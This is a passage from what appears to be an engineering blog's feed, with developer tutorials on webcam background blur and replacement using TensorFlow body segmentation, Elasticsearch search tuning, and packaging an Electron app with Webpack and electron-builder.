App;</code></pre><p>In the code above, we render a <code>&lt;video&gt;</code> element, and once the app is mounted, we obtain the video stream from the user's webcam using <code>navigator.mediaDevices.getUserMedia</code>. This call will prompt the user to grant permission to access their camera. Once the user grants permission, the video stream is captured and rendered in the <code>&lt;video&gt;</code> element.</p><h3>Installing packages</h3><p>Next, let's add the necessary TensorFlow packages.</p><pre><code class="language-bash">yarn add @tensorflow/tfjs-core @tensorflow/tfjs-converter @tensorflow-models/body-segmentation @mediapipe/selfie_segmentation</code></pre><p><code>@tensorflow/tfjs-core</code> is the core JavaScript package for TensorFlow, <code>@tensorflow-models/body-segmentation</code> contains all the functions we need for body segmentation, and <code>@mediapipe/selfie_segmentation</code> is our pre-trained model.</p><h3>Creating the body segmenter</h3><p>The TensorFlow body segmentation package provides a pre-trained <code>MediaPipeSelfieSegmentation</code> model for segmenting the human body in images and videos. This model is specifically designed for the upper body.
If our requirement involves the entire body, we may want to consider other models like <a href="https://github.com/tensorflow/tfjs-models/tree/master/body-pix">BodyPix</a>.</p><p>We need to load this model to create a segmenter.</p><pre><code class="language-js">import * as bodySegmentation from &quot;@tensorflow-models/body-segmentation&quot;;

const createSegmenter = async () =&gt; {
  const model = bodySegmentation.SupportedModels.MediaPipeSelfieSegmentation;
  const segmenterConfig = {
    runtime: &quot;mediapipe&quot;,
    solutionPath: &quot;https://cdn.jsdelivr.net/npm/@mediapipe/selfie_segmentation&quot;,
    modelType: &quot;general&quot;,
  };

  return bodySegmentation.createSegmenter(model, segmenterConfig);
};</code></pre><p>We load the model from a CDN, configure the runtime as <code>mediapipe</code>, and set the modelType to <code>general</code>. Then, we create the <code>segmenter</code> using the <code>bodySegmentation.createSegmenter</code> method.</p><pre><code class="language-js">// ./videoBackground.js
import * as bodySegmentation from &quot;@tensorflow-models/body-segmentation&quot;;

const createSegmenter = async () =&gt; {
  const model = bodySegmentation.SupportedModels.MediaPipeSelfieSegmentation;
  const segmenterConfig = {
    runtime: &quot;mediapipe&quot;,
    solutionPath: &quot;https://cdn.jsdelivr.net/npm/@mediapipe/selfie_segmentation&quot;,
    modelType: &quot;general&quot;,
  };

  return bodySegmentation.createSegmenter(model, segmenterConfig);
};

class VideoBackground {
  #segmenter;

  getSegmenter = async () =&gt; {
    if (!this.#segmenter) {
      this.#segmenter = await createSegmenter();
    }

    return this.#segmenter;
  };
}

const videoBackground = new VideoBackground();

export default videoBackground;</code></pre><p>Here, we define a <code>VideoBackground</code> class and create an instance of it.
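The lazy-initialization pattern behind <code>getSegmenter</code> can be shown in isolation. A minimal Node sketch (the <code>LazyResource</code> class and <code>createCalls</code> counter are illustrative, not part of the app's code):

```javascript
let createCalls = 0;

class LazyResource {
  #resource;

  // Async getter: creates the resource on first call, then reuses it,
  // mirroring the role of getSegmenter() in the VideoBackground class.
  get = async () => {
    if (!this.#resource) {
      createCalls += 1; // stands in for the expensive createSegmenter() call
      this.#resource = { id: createCalls };
    }

    return this.#resource;
  };
}

const lazy = new LazyResource();

lazy.get().then(a =>
  lazy.get().then(b => console.log(createCalls, a === b)) // 1 true
);
```

One caveat with this pattern in general: two calls issued before the first creation resolves can each trigger a creation; memoizing the promise itself, rather than the resolved value, avoids that.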
Inside the class, the <code>getSegmenter</code> function ensures that the <code>segmenter</code> is created only once, so we don't have to recreate it each time.</p><h3>Blur the video background</h3><p>Before we continue further, let's update our demo app. Since we are going to modify the video, we need a <code>&lt;canvas/&gt;</code> to display the modified video. Add that to our demo app.</p><pre><code class="language-js">// rest of the code...

const App = () =&gt; {
  const canvasRef = useRef();

  // rest of the code...

  return (
    &lt;div&gt;
      &lt;video
        ref={videoRef}
        autoPlay
        width=&quot;640&quot;
        height=&quot;480&quot;
        style={{ display: &quot;none&quot; }}
      /&gt;
      &lt;canvas ref={canvasRef} width=&quot;640&quot; height=&quot;480&quot; style={{ transform: &quot;scaleX(-1)&quot; }} /&gt;
    &lt;/div&gt;
  );
};</code></pre><p>Also, hide the <code>&lt;video&gt;</code> element by setting <code>display: &quot;none&quot;</code> since we don't want to display the raw video.</p><p>Next, create a function within the <code>VideoBackground</code> class to blur the video.</p><pre><code class="language-js">// rest of the code...

class VideoBackground {
  // rest of the code...
  #animationId;

  stop = () =&gt; {
    cancelAnimationFrame(this.#animationId);
  };

  blur = async (canvas, video) =&gt; {
    const foregroundThreshold = 0.5;
    const edgeBlurAmount = 15;
    const flipHorizontal = false;
    const blurAmount = 5;
    const segmenter = await this.getSegmenter();

    const processFrame = async () =&gt; {
      const segmentation = await segmenter.segmentPeople(video);

      await bodySegmentation.drawBokehEffect(
        canvas,
        video,
        segmentation,
        foregroundThreshold,
        blurAmount,
        edgeBlurAmount,
        flipHorizontal
      );

      this.#animationId = requestAnimationFrame(processFrame);
    };

    this.#animationId = requestAnimationFrame(processFrame);
  };
}</code></pre><p>The <code>blur</code> function takes <code>canvas</code> and <code>video</code> references. It uses <code>requestAnimationFrame</code> to continuously draw the resulting image onto the <code>canvas</code>. First, it creates a body segmentation using the <code>segmenter.segmentPeople</code> function by passing the video reference. This allows us to identify which pixels belong to the background and foreground.</p><p>To achieve the blurred effect, we use the <code>bodySegmentation.drawBokehEffect</code> function, which applies a blur to the background pixels. This function accepts additional configurations like <code>foregroundThreshold</code>, <code>blurAmount</code>, and <code>edgeBlurAmount</code>, which we can adjust to customize the effect.</p><p>We've also added a <code>stop</code> function to halt video processing by canceling the recursive <code>requestAnimationFrame</code> calls.</p><pre><code class="language-jsx">import React, { useRef, useEffect, useState } from &quot;react&quot;;

function App() {
  const [cameraReady, setCameraReady] = useState(false);

  // rest of the code...

  &lt;video
    // rest of the code...
    onLoadedMetadata={() =&gt; setCameraReady(true)}
  /&gt;;

  // rest of the code...
}</code></pre><p>Before calling the <code>blur</code> function, ensure the video is loaded by waiting for the <code>onLoadedMetadata</code> event to be triggered.</p><p>All set; let's blur the video background.</p><pre><code class="language-jsx">import React, { useRef, useEffect, useState } from &quot;react&quot;;
import videoBackground from &quot;./videoBackground&quot;;

function App() {
  const [cameraReady, setCameraReady] = useState(false);
  const videoRef = useRef(null);
  const canvasRef = useRef();

  useEffect(() =&gt; {
    async function getVideo() {
      try {
        const stream = await navigator.mediaDevices.getUserMedia({
          video: true,
        });
        if (videoRef.current) {
          videoRef.current.srcObject = stream;
        }
      } catch (err) {
        console.error(&quot;Error accessing webcam: &quot;, err);
      }
    }

    getVideo();

    return () =&gt; {
      if (videoRef.current &amp;&amp; videoRef.current.srcObject) {
        videoRef.current.srcObject.getTracks().forEach(track =&gt; track.stop());
      }
    };
  }, []);

  useEffect(() =&gt; {
    if (!cameraReady) return;

    videoBackground.blur(canvasRef.current, videoRef.current);

    return () =&gt; {
      videoBackground.stop();
    };
  }, [cameraReady]);

  return (
    &lt;div className=&quot;App&quot;&gt;
      &lt;video
        ref={videoRef}
        autoPlay
        width=&quot;640&quot;
        height=&quot;480&quot;
        style={{ display: &quot;none&quot; }}
        onLoadedMetadata={() =&gt; setCameraReady(true)}
      /&gt;
      &lt;canvas ref={canvasRef} width=&quot;640&quot; height=&quot;480&quot; /&gt;
    &lt;/div&gt;
  );
}

export default App;</code></pre><p>Here, we added another <code>useEffect</code> that triggers when <code>cameraReady</code> is <code>true</code>. Inside this <code>useEffect</code>, we call the <code>videoBackground.blur</code> function, passing the <code>canvas</code> and <code>video</code>
refs. When the component unmounts, we stop the video processing by calling the <code>videoBackground.stop()</code> function.</p><h3>Replace with a virtual background</h3><p>If we feel that just blurring is not enough and want to completely replace the background, we need to remove the background from the video and place an <code>&lt;img/&gt;</code> behind the <code>&lt;canvas/&gt;</code>. To remove the background, we can utilize the <code>bodySegmentation.toBinaryMask</code> function. This function will return an <a href="https://developer.mozilla.org/en-US/docs/Web/API/ImageData">ImageData</a> with its alpha channel being <code>255</code> for the background and <code>0</code> for the foreground. We can use this information to set the alpha of the background pixels in the original frame to <code>0</code>, making them transparent.</p><pre><code class="language-js">// rest of the code...

class VideoBackground {
  // rest of the code...

  remove = async (canvas, video) =&gt; {
    const context = canvas.getContext(&quot;2d&quot;);
    const segmenter = await this.getSegmenter();

    const processFrame = async () =&gt; {
      context.drawImage(video, 0, 0);

      const segmentation = await segmenter.segmentPeople(video);
      const coloredPartImage = await bodySegmentation.toBinaryMask(segmentation);
      const imageData = context.getImageData(
        0,
        0,
        video.videoWidth,
        video.videoHeight
      );

      // imageData format: [R,G,B,A,R,G,B,A...]
      // The loop below iterates through the alpha channel.
      for (let i = 3; i &lt; imageData.data.length; i += 4) {
        // A background pixel's alpha in the mask will be 255.
        if (coloredPartImage.data[i] === 255) {
          imageData.data[i] = 0; // background pixel: make it fully transparent
        }
      }

      await bodySegmentation.drawMask(canvas, imageData);

      this.#animationId = requestAnimationFrame(processFrame);
    };

    this.#animationId = requestAnimationFrame(processFrame);
  };
}</code></pre><p>Similar to the blurring process, inside <code>processFrame</code>, we first create the segmentation using <code>segmenter.segmentPeople</code> and convert it to a binary mask using <code>bodySegmentation.toBinaryMask</code>. We then obtain the original image data with <code>context.getImageData</code>. Next, we loop through the image data to make the background pixels transparent. Finally, we draw the result on the canvas using <code>bodySegmentation.drawMask</code>.</p><p>Before calling this function, let's modify our demo app by adding an option to switch between <code>none</code>, <code>blur</code>, and <code>image</code> effects, rather than removing the blur function. Additionally, include a background image.</p><pre><code class="language-js">const BACKGROUND_OPTIONS = [&quot;none&quot;, &quot;blur&quot;, &quot;image&quot;];

function App() {
  const [backgroundType, setBackgroundType] = useState(BACKGROUND_OPTIONS[0]);

  // rest of the code...

  return (
    &lt;div&gt;
      // rest of the code...
      {backgroundType === &quot;image&quot; &amp;&amp; (
        &lt;img
          alt=&quot;&quot;
          style={{
            position: &quot;absolute&quot;,
            top: 0,
            bottom: 0,
            width: &quot;640px&quot;,
            height: &quot;480px&quot;,
          }}
          src=&quot;/bgImage.png&quot;
        /&gt;
      )}
      // rest of the code...
      &lt;div&gt;
        &lt;select
          value={backgroundType}
          onChange={e =&gt; setBackgroundType(e.target.value)}
        &gt;
          {BACKGROUND_OPTIONS.map(option =&gt; (
            &lt;option value={option} key={option}&gt;
              {option}
            &lt;/option&gt;
          ))}
        &lt;/select&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  );
}</code></pre><p>Here, we added a <code>&lt;select&gt;</code> element to choose between <code>none</code>, <code>blur</code>, and <code>image</code>, and an <code>&lt;img&gt;</code> element to display the background image, which will serve as our virtual background.</p><p>All set. Now, let's update the <code>useEffect</code>.</p><pre><code class="language-js">useEffect(() =&gt; {
  if (!cameraReady || backgroundType === &quot;none&quot;) return;

  const bgFn =
    backgroundType === &quot;blur&quot; ? videoBackground.blur : videoBackground.remove;
  bgFn(canvasRef.current, videoRef.current);

  return () =&gt; {
    videoBackground.stop();
  };
}, [cameraReady, backgroundType]);</code></pre><p>Based on the selection, we will call either <code>videoBackground.blur</code> or <code>videoBackground.remove</code>.</p><p>The full working example can be found in this <a href="https://github.com/bigbinary/tensorflow-body-segmentation-example">GitHub repo</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Improving search experience using Elasticsearch]]></title>
       <author><name>Sayooj Surendran</name></author>
      <link href="https://www.bigbinary.com/blog/elasticsearch-improvements"/>
      <updated>2024-10-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/elasticsearch-improvements</id>
      <content type="html"><![CDATA[<p>We use Elasticsearch in <a href="https://neeto.com/neetocourse">NeetoCourse</a> for our searching needs. Recently, we made some changes to the Elasticsearch config to improve the search experience. In this blog, we will share the changes we made and what we learned during the process.</p><h2>Definitions</h2><p>Here are some of the Elasticsearch terms we use in this blog.</p><ul><li><p><strong>Document:</strong> A document in Elasticsearch is similar to a row in a database table. It is a collection of key-value pairs.</p></li><li><p><strong>Index:</strong> An index is a collection of documents, similar to a database table. Indexing is the process of building the index, and we can configure each step of this process.</p></li><li><p><strong>Analyzer:</strong> An analyzer converts a string into a list of searchable tokens. An analyzer is composed of three kinds of components: character filters, a tokenizer, and token filters.</p></li><li><p><strong>Character Filter:</strong> A character filter transforms or removes certain characters from the input string before tokenization; for example, stripping HTML tags to keep only the text.</p></li><li><p><strong>Tokenizer:</strong> A tokenizer splits the input string into tokens. The split can be based on whitespace, punctuation, or any other character.</p></li><li><p><strong>Token Filter:</strong> A token filter modifies or removes the tokens produced by the tokenizer. For example, it can be used to remove stop words (a, the, and, etc.) 
which serve no purpose in the search.</p></li></ul><h2>Analyzer</h2><p>This is our analyzer setup:</p><pre><code class="language-js">{
  default: {
    tokenizer: &quot;whitespace&quot;,
    filter: [&quot;lowercase&quot;, &quot;autocomplete&quot;]
  },
  search: {
    tokenizer: &quot;whitespace&quot;,
    filter: [&quot;lowercase&quot;]
  },
  english_exact: {
    tokenizer: &quot;whitespace&quot;,
    filter: [
      &quot;lowercase&quot;
    ]
  }
}</code></pre><p><code>default</code> is the analyzer used while indexing. The search terms from the user are passed through the <code>search</code> analyzer. <code>english_exact</code> is the analyzer used for exact matches.</p><h3>Tokenizer</h3><p>By default, Elasticsearch uses the <code>standard</code> tokenizer, which splits the input string into tokens based on word boundaries and discards most punctuation. Since our content is mostly about technical concepts and programming, where punctuation inside identifiers matters, we cannot use the <code>standard</code> tokenizer. The <code>whitespace</code> tokenizer splits the input string into tokens only on whitespace, which is suitable for our use case. Hence, we use the <code>whitespace</code> tokenizer for all the analyzers.</p><h3>Filter</h3><p>The <code>lowercase</code> filter converts all the tokens to lowercase before storing them in the index. This is a common requirement, as we want the search to be case-insensitive. We also use a custom <code>autocomplete</code> filter. Let's see its definition:</p><pre><code class="language-js">{
  autocomplete: {
    &quot;type&quot;: &quot;edge_ngram&quot;,
    &quot;min_gram&quot;: 3,
    &quot;max_gram&quot;: 20,
    &quot;preserve_original&quot;: true
  }
}</code></pre><p>The custom <code>autocomplete</code> filter is an implementation of the <a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/analysis-edgengram-tokenfilter.html">edge_ngram</a> token filter. 
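</p><p>To make <code>min_gram</code>, <code>max_gram</code> and <code>preserve_original</code> concrete, here is a small standalone sketch of what the filter does to a single token. This is our own illustrative function, not Elasticsearch code:</p>

```javascript
// Hypothetical re-implementation of the edge_ngram token filter's behavior
// for a single token (illustration only; Elasticsearch does this internally).
function edgeNgrams(token, minGram, maxGram, preserveOriginal = true) {
  const grams = [];
  for (let n = minGram; n <= Math.min(maxGram, token.length); n += 1) {
    grams.push(token.slice(0, n)); // every prefix between minGram and maxGram chars
  }
  // preserve_original keeps tokens shorter than min_gram, such as "in".
  if (preserveOriginal && !grams.includes(token)) grams.push(token);
  return grams;
}

console.log(edgeNgrams("Elephant", 3, 20));
// ["Ele", "Elep", "Eleph", "Elepha", "Elephan", "Elephant"]
console.log(edgeNgrams("in", 3, 20)); // ["in"]
```

<p>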
Let's see the result of this filter when applied on the phrase&quot;Elephant in the room&quot;.</p><pre><code class="language-js">{  &quot;tokens&quot;: [    {      &quot;token&quot;: &quot;Ele&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Elep&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Eleph&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Elepha&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Elephan&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;Elephant&quot;,      &quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;in&quot;,      &quot;start_offset&quot;: 9,      &quot;end_offset&quot;: 11,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 1    },    {      &quot;token&quot;: &quot;the&quot;,      &quot;start_offset&quot;: 12,      &quot;end_offset&quot;: 15,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 2    },    {      &quot;token&quot;: &quot;roo&quot;,      &quot;start_offset&quot;: 16,      &quot;end_offset&quot;: 20,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 3    },    {      
&quot;token&quot;: &quot;room&quot;,      &quot;start_offset&quot;: 16,      &quot;end_offset&quot;: 20,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 3    }  ]}</code></pre><p>The <code>edge_ngram</code> filter creates <a href="https://en.wikipedia.org/wiki/N-gram">n-grams</a> anchored at the first character of each token. Since we specified <code>min_gram</code> as 3 and <code>max_gram</code> as 20, the filter emits every prefix of a token that is between 3 and 20 characters long. This means a term is indexed for every such prefix of a word. If we start typing &quot;ELEP&quot;, there will already be a term in the index corresponding to &quot;ELEP&quot;, and we will get the result &quot;Elephant in the room&quot;.</p><h2>The Query</h2><p>The query object in the search request is equally important for getting relevant results. Elasticsearch sorts matching search results by <em>relevance score</em>, which measures how well each document matches a query. The query clause contains the criteria for calculating the relevance score. 
This is our query object:</p><pre><code class="language-js">{
  bool: {
    should: [
      {
        simple_query_string: {
          query: requestBody.searchTerm,
          fields: [&quot;content&quot;, &quot;meta.pageTitle&quot;, &quot;meta.chapterTitle&quot;],
          quote_field_suffix: &quot;.exact&quot;,
        },
      },
      {
        match: {
          content: {
            query: requestBody.searchTerm,
            ...baseFuzzyQueryConfig(),
          },
        },
      },
      {
        match: {
          &quot;meta.pageTitle&quot;: {
            query: requestBody.searchTerm,
            ...baseFuzzyQueryConfig(),
            boost: 1.5,
          },
        },
      },
      {
        match: {
          &quot;meta.chapterTitle&quot;: {
            query: requestBody.searchTerm,
            ...baseFuzzyQueryConfig(),
            boost: 1.5,
          },
        },
      },
    ],
    minimum_should_match: 1,
  },
};</code></pre><p>The <code>bool</code> and <code>should</code> clauses are used to create a compound query. The <code>should</code> clause means that at least one of the queries should match. <code>match</code> is the standard query used for full-text search. <code>content</code>, <code>meta.pageTitle</code> and <code>meta.chapterTitle</code> are the fields that we created while indexing the data.</p><p>We have provided a <code>boost</code> value of 1.5 for the page title and the chapter title. This makes sure that a match in a page or chapter title gets a higher relevance score than a match in the middle of a page's content.</p><p>The <code>simple_query_string</code> query is used for exact matches; when the search term contains double quotes, the <code>english_exact</code> analyzer is used. 
The double quotes operator ( <code>&quot;</code> ) is one of the <a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-simple-query-string-query.html#simple-query-string-syntax">several operators</a> that can be used in the <code>simple_query_string</code> query.</p><h3>Fuzzy searching</h3><p>We also use fuzzy searching in the <code>match</code> query. Fuzzy searching helps in giving proper results even if there are typos in the search term. Elasticsearch uses the <a href="https://en.wikipedia.org/wiki/Levenshtein_distance">Levenshtein distance</a> to calculate the similarity between the search term and the indexed data. Previously, we used the <a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-fuzzy-query.html">fuzzy query</a> to implement fuzzy searching.</p><pre><code class="language-js">{
  content: {
    value: requestBody.searchTerm,
    ...extendedFuzzyQueryConfig(),
  },
},</code></pre><p>But this caused several issues:</p><ul><li>Fuzzy results being prioritized over exact matches. For example, searching for &quot;five&quot; returned results for &quot;dive&quot;, even when &quot;five&quot; was present in the content.</li><li>Fuzzy results not being returned when the search term contained multiple words.</li></ul><p>Upon investigation, we found that the <code>fuzzy</code> query does not perform analysis on the search term. Instead, we now use the <code>match</code> query with the <code>fuzziness</code> parameter.</p><pre><code class="language-js">const baseFuzzyQueryConfig = () =&gt; ({
  prefix_length: 0,
  fuzziness: &quot;AUTO&quot;,
});
...
{
  content: {
    query: requestBody.searchTerm,
    ...baseFuzzyQueryConfig(),
  },
},</code></pre><h2>Conclusion</h2><p>There is no silver bullet when it comes to Elasticsearch configuration, and there is no single metric to determine whether the search is giving quality results. We have tweaked our configuration based on trial and error and on user feedback. 
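</p><p>As a closing aside, the fuzzy matching discussed above rests on the Levenshtein distance. A minimal standalone sketch (our own code, not Elasticsearch's implementation) shows why &quot;five&quot; could match &quot;dive&quot;:</p>

```javascript
// Classic dynamic-programming Levenshtein distance: the minimum number of
// single-character insertions, deletions and substitutions to turn a into b.
function levenshtein(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j += 1) dp[0][j] = j;
  for (let i = 1; i <= a.length; i += 1) {
    for (let j = 1; j <= b.length; j += 1) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1, // deletion
        dp[i][j - 1] + 1, // insertion
        dp[i - 1][j - 1] + cost // substitution (or exact match)
      );
    }
  }
  return dp[a.length][b.length];
}

console.log(levenshtein("five", "dive")); // 1, so "dive" is within AUTO fuzziness of "five"
```

<p>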
We hope these techniques are useful for anyone who is looking to improve their search experience.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Building and publishing an Electron application using electron-builder]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/publish-electron-application"/>
      <updated>2024-10-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/publish-electron-application</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a Loom alternative. The desktop application was built using Electron. In a series of blogs, we capture how we built the desktop application and the challenges we ran into. This blog is part 2 of the blog series. You can also read <a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>, <a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>, <a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>, <a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>, <a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>, <a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a>, <a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and <a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>Building, packaging and publishing an app with the default Electron npm packages can be quite challenging. It involves multiple packages and offers limited customization. Additionally, setting up auto-updates requires significant additional effort, often involving separate tools or services.</p><p><a href="https://www.electron.build/">electron-builder</a> is a complete solution for building, packaging, and distributing <a href="https://electronjs.org/">Electron</a> applications for macOS, Windows, and Linux. It is a highly configurable alternative to the default Electron packaging process that supports auto-update out of the box.</p><p>In this blog, we look into how we can build, package and distribute Electron applications using <code>electron-builder</code>.</p><h3>Electron processes</h3><p>Electron has two types of processes: the <code>main</code> process and the <code>renderer</code> process. 
The main process acts as the entry point to the application, where we can create a browser window and load a webpage. This webpage runs in the <code>renderer</code> process. The <code>main</code> process is written in <code>Node.js</code>, while the renderer process can be developed using plain JavaScript or any JS framework like <code>React</code>, <code>Vue</code>, or <code>Angular</code>.</p><h3>Project structure</h3><p>When building an Electron application, it's best to keep the <code>main</code> and <code>renderer</code> processes in separate folders since they are built separately.</p><pre><code class="language-javascript">electron-app
  assets
  release
  src
    main
      main.js
    renderer
      App.jsx
      index.ejs
  node_modules
  package.json</code></pre><h3>Browser window preload script</h3><p>Since the <code>main</code> process is written in <code>Node.js</code>, it has access to <code>Node.js</code> and Electron APIs, but the <code>renderer</code> process does not. To bridge this gap, Electron supports a special script called a <code>preload</code> script, which we can specify when creating a <code>BrowserWindow</code>. This script runs in a context that has access to both the HTML DOM and a limited subset of Node.js and Electron APIs. 
An example<code>preload</code> script looks like this:</p><pre><code class="language-js">import { contextBridge, ipcRenderer } from &quot;electron&quot;;const electronHandler = {  ipcRenderer: {    sendMessage(channel, ...args) {      ipcRenderer.send(channel, ...args);    },    on(channel, func) {      const subscription = (_event, ...args) =&gt; func(...args);      ipcRenderer.on(channel, subscription);      return () =&gt; {        ipcRenderer.removeListener(channel, subscription);      };    },    once(channel, func) {      ipcRenderer.once(channel, (_event, ...args) =&gt; func(...args));    },  },};contextBridge.exposeInMainWorld(&quot;electron&quot;, electronHandler);</code></pre><p>This preload script exposes <code>send</code>, <code>on</code> and <code>once</code> methods of <code>ipcRenderer</code> tothe renderer process via the <code>contextBridge</code>. It allows the renderer to sendmessages, listen for events, and handle one-time events from the main processwhile maintaining security by controlling which APIs are accessible.</p><h3>Build</h3><p>Since an Electron application has two processes, we need two separate Webpackconfigurationsone for the <code>main</code> process and another for the <code>renderer</code>process.</p><pre><code class="language-js">// ./config/webpack/main.mjsimport path from &quot;path&quot;;import webpack from &quot;webpack&quot;;import { merge } from &quot;webpack-merge&quot;;import TerserPlugin from &quot;terser-webpack-plugin&quot;;const configuration = {  target: &quot;electron-main&quot;,  entry: {    main: &quot;src/main/main.mjs&quot;,    preload: &quot;src/main/preload.mjs&quot;,  },  output: {    path: &quot;release/app/dist/main&quot;,    filename: &quot;[name].js&quot;,    library: {      type: &quot;umd&quot;,    },  },  optimization: {    minimizer: [      new TerserPlugin({        parallel: true,      }),    ],  },  node: {    __dirname: false,    __filename: false,  },};export default 
configuration;</code></pre><p>The above is a basic Webpack configuration for the <code>main</code> process. Webpacksupports Electron out of the box, so by setting <code>target: &quot;electron-main&quot;</code>,Webpack includes all the necessary Electron variables. Since we also have a<code>preload</code> script, we added <code>preload.mjs</code> as an entry point as well. We will beminifying the code using <code>TerserPlugin</code>.</p><p>Another important detail is that we've disabled <code>__dirname</code> and <code>__filename</code>.This prevents Webpack's handling of these variables from interfering withNode.js's native <code>__dirname</code> and <code>__filename</code>, ensuring they behave as expectedin our Electron app.</p><pre><code class="language-js">// ./config/webpack/renderer.mjsimport path from &quot;path&quot;;import webpack from &quot;webpack&quot;;import HtmlWebpackPlugin from &quot;html-webpack-plugin&quot;;import MiniCssExtractPlugin from &quot;mini-css-extract-plugin&quot;;import { BundleAnalyzerPlugin } from &quot;webpack-bundle-analyzer&quot;;import CssMinimizerPlugin from &quot;css-minimizer-webpack-plugin&quot;;import { merge } from &quot;webpack-merge&quot;;import TerserPlugin from &quot;terser-webpack-plugin&quot;;const configuration = {  target: [&quot;web&quot;, &quot;electron-renderer&quot;],  entry: &quot;src/renderer/App.jsx&quot;,  output: {    path: &quot;release/app/dist/renderer&quot;,    publicPath: &quot;./&quot;,    filename: &quot;renderer.js&quot;,    library: {      type: &quot;umd&quot;,    },  },  module: {    rules: [      {        test: /\.s?(a|c)ss$/,        use: [          MiniCssExtractPlugin.loader,          {            loader: &quot;css-loader&quot;,            options: {              modules: true,              sourceMap: true,              importLoaders: 1,            },          },          &quot;sass-loader&quot;,        ],        include: /\.module\.s?(c|a)ss$/,      },      {        test: /\.s?(a|c)ss$/,      
  use: [          MiniCssExtractPlugin.loader,          &quot;css-loader&quot;,          &quot;sass-loader&quot;,          &quot;postcss-loader&quot;,        ],        exclude: /\.module\.s?(c|a)ss$/,      },      // Fonts      {        test: /\.(woff|woff2|eot|ttf|otf)$/i,        type: &quot;asset/resource&quot;,      },      // Images      {        test: /\.(png|jpg|jpeg|gif)$/i,        type: &quot;asset/resource&quot;,      },      // SVG      {        test: /\.svg$/,        use: [          {            loader: &quot;@svgr/webpack&quot;,            options: {              prettier: false,              svgo: false,              svgoConfig: {                plugins: [{ removeViewBox: false }],              },              titleProp: true,              ref: true,            },          },          &quot;file-loader&quot;,        ],      },    ],  },  optimization: {    minimize: true,    minimizer: [new TerserPlugin(), new CssMinimizerPlugin()],  },  plugins: [    new MiniCssExtractPlugin({      filename: &quot;style.css&quot;,    }),    new HtmlWebpackPlugin({      filename: &quot;index.html&quot;,      template: &quot;src/renderer/index.ejs&quot;,      minify: {        collapseWhitespace: true,        removeAttributeQuotes: true,        removeComments: true,      },      isBrowser: false,      isDevelopment: false,    }),  ],};export default configuration;</code></pre><p>In the <code>renderer</code> configuration, we set the target to<code>target: [&quot;web&quot;, &quot;electron-renderer&quot;]</code>, which provides both standard web andElectron's renderer variables. Similar to a typical web application setup, weload various plugins to handle fonts, images, and SVGs and to minify CSS andJavaScript. 
Since JavaScript files are loaded locally in an Electronapplication, we can bundle everything into a single file called <code>renderer.js</code>instead of splitting it into multiple chunks as we would for a standard webapplication.</p><p>Our build configuration is ready; add it to <code>scripts</code> in <code>package.json</code> for easyexecution.</p><pre><code class="language-json">&quot;scripts&quot;: {    &quot;build:main&quot;: &quot;cross-env NODE_ENV=production webpack --config ./config/webpack/main.mjs&quot;,    &quot;build:renderer&quot;: &quot;cross-env NODE_ENV=production webpack --config ./config/webpack/renderer.mjs&quot;,    &quot;build&quot;: &quot;yarn build:main &amp;&amp; yarn build:renderer&quot;,}</code></pre><p>Great! Now, we can build the entire Electron application using a single<code>yarn build</code> command.</p><h3>Package</h3><p>We can configure the <code>electron-builder</code> in <code>package.json</code> using the <code>build</code>field. Below is an example configuration for an app named <code>MyApp</code>.</p><pre><code class="language-json"> &quot;build&quot;: {    &quot;productName&quot;: &quot;MyApp&quot;,    &quot;appId&quot;: &quot;com.neeto.MyApp&quot;,    &quot;directories&quot;: {      &quot;app&quot;: &quot;release/app&quot;,      &quot;buildResources&quot;: &quot;assets&quot;,      &quot;output&quot;: &quot;release/build&quot;    },     &quot;mac&quot;: {      &quot;target&quot;: {        &quot;target&quot;: 